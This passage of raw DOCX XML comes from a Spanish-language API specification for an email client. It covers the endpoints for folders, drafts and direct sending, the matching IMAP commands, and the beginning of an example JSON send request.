            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/api/accounts/:accountId/folders/:id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Renombra carpeta o actualiza orden</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">name?: string</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">sortOrder?: number</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">subscribed?: boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">—</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">DELETE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/api/accounts/:accountId/folders/:id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Elimina carpeta (y su contenido si está vacía)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">force?: boolean</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">(default: false)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">POST</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/api/accounts/:accountId/folders/:id/empty</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Vacía carpeta (elimina todos los mensajes)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">—</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Las operaciones de creación, renombrado y eliminación de carpetas se ejecutan directamente contra el servidor IMAP mediante los comandos IMAP CREATE, RENAME y DELETE, respectivamente. Tras una operación exitosa, se invalida el cache local de folders y se ejecuta una sincronización de la jerarquía</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[1]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="92"/>
    <w:bookmarkStart w:id="93" w:name="composición-y-envío"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">6.5 Composición y Envío</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:type="pct" w:w="5000"/>
        <w:tblLook w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0" w:val="0020"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1173"/>
        <w:gridCol w:w="880"/>
        <w:gridCol w:w="1906"/>
        <w:gridCol w:w="1906"/>
        <w:gridCol w:w="2053"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Método</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Path</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Descripción</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Body Params</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Query Params</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">GET</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/api/drafts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Lista borradores del usuario</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">accountId?: string</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">GET</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/api/drafts/:id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Obtiene un borrador específico</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POST</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/api/drafts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Crea un nuevo borrador</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">accountId: string</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">to?: Address[]</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">cc?: Address[]</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">bcc?: Address[]</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">subject?: string</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">bodyHtml?: string</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">bodyText?: string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">—</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">PATCH</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/api/drafts/:id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Actualiza borrador (auto-save)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">to?: Address[]</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">cc?: Address[]</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">bcc?: Address[]</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">subject?: string</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">bodyHtml?: string</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">bodyText?: string</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">attachments?: DraftAttachment[]</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">—</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">DELETE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/api/drafts/:id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Elimina borrador</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POST</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/api/drafts/:id/send</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Envía borrador (SMTP → copia en Sent → borra draft)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">includeSignature?: boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">—</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">POST</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/api/send</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Envío directo sin crear borrador previo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">accountId: string</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">to: Address[]</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">cc?: Address[]</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">bcc?: Address[]</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">subject: string</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">bodyHtml?: string</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">bodyText?: string</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">attachments?: string[]</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">(storageKeys),</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">replyTo?: ReplyToConfig</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">includeSignature?: boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">—</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Ejemplo de envío directo:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// Request POST /api/send</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">{</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"accountId"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"507f1f77bcf86cd799439012"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"to"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> [{ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"name"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"Destinatario"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"address"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"dest@empresa.com"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> }]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"cc"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> [{ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"address"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"copia@empresa.com"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> }]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>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"Propuesta de colaboración"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
